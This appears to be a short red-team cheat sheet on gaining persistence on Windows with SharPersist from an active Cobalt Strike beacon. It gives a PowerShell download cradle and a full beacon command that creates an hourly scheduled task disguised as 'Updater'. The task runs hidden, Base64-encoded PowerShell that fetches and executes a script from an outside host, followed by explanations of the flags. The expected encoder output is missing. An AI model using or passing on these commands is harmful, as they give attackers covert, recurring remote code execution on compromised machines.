
SharPersist and an existing Cobalt Strike beacon required.

Convert payload PowerShell to Base64 (note that PowerShell encoded command option -enc only accept UTF-16LE):

$str = 'iex ((new-object net.webclient).downloadstring(""))'

Pretend the output is:


In an active beacon session:

beacon> execute-assembly C:\Tools\SharPersist\SharPersist\bin\Release\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwBuAGkAYwBrAGUAbAB2AGkAcABlAHIALgBjAG8AbQAvAGEAIgApACkA" -n "Updater" -m add -o hourly


  • -t is the desired persistence technique.
  • -c is the command to execute.
  • -a are any arguments for that command.
  • -n is the name of the task.
  • -m is to add the task (you can also remove, check and list).
  • -o is the task frequency.